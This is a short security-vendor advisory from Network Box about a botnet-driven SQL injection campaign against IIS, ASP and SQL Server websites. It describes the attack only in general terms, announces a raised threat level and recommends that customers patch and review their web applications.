Network Box Monitors Global Release of an SQL Injection Attack (via botnet)
Over the past few days, Network Box has been monitoring an increase in targetted SQL Injection website attack activity. Currently, this only appears to be affecting certain versions of the Microsoft IIS web server, coupled with Active Server Pages (ASP) scripting and Microsoft SQL Server. The attacker attempts to modify sql database records for websites.
Wikipedia defines SQL Injection as: a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
These forms of attack are extremely hard to stop at the gateway; as the attacks are application dependent and therefore generic IDP/IDS rules can provide only limited defence. Network Box has a number of IDP rules in place, however these only guard against known specific attacks at which time it may be too late in defending against 0 day targeted attacks against web servers. Application level security by the way of strict input validation is ultimately the only way to thwart these type of attacks at a server level.
Starting June 20th, around midday GMT, Network Box Security Response monitored a dramatic increase in malicious activity. We are now recording blocks (as HTTP-S-SQLINJWORM) across all continents and from over 40 source countries. It appears that a major botnet with at least 4,000 compromised hosts is responsible for these attacks.
In response to this heightened activity, Network Box Security Response has increased our global threat level indicator to alert condition 3. We continue to closely monitor the situation, and will further refine and improve our protection signatures and heuristics, as we see the attacks change.
However, we do recommend that customers operating public webservers (in particular those accessible to the Internet) do review the scripts and applications on their web servers and ensure they are up-to-date and patched so as not to be vulnerable to this class of attack.
